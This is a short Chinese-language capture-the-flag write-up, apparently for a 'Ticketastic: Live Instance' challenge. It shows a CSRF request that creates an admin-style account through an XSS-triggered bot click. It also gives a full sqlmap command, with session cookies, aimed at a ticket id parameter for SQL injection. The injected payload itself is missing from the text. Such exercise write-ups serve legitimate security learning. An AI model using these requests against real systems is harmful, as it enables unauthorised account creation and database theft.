08.Ticketastic: Live Instance
从07的demo上看,这个环境有XSS,还有SQL注入。 现在是admin login密码错误,但是我们还有一个输入点,那就是提交票的标题和内容。
从07的demo上看,这个环境有XSS,还有SQL注入。 现在是admin login密码错误,但是我们还有一个输入点,那就是提交票的标题和内容。
那是否可以CSRF呢?我在XSS中创建一个用户,看看是否可以
创建用户
GET http://34.94.3.143/eb0fe4d167/newUser?username=root&password=root&password2=root
我们把它改成
这样admin点击之后就直接创建了一个用户

再换一个需要点击链接的,看看机器人是否会点击
root/123456 登录成功
我们拿到了一个FLAG

第二个FLAG应该就是那个SQL注入了,我们用sqlmap 来跑一下试试
sqlmap -u “http://34.94.3.143/44dbc733c3/ticket?id=1” —cookie=“session_level7a=eyJ1c2VyIjoiYWRtaW4ifQ.YWD17g.9yvm5JT5avV0dUyDeSsKpZVBXs4; session_level7b=eyJ1c2VyIjoicm9vdCJ9.YWD5AA.KpsfO9YOdIzFJ9ud1Br6L6trEXA” -o —threads 10 -v 3 —technique=U —dbms=“mysql” —common-tables

也可以手工注入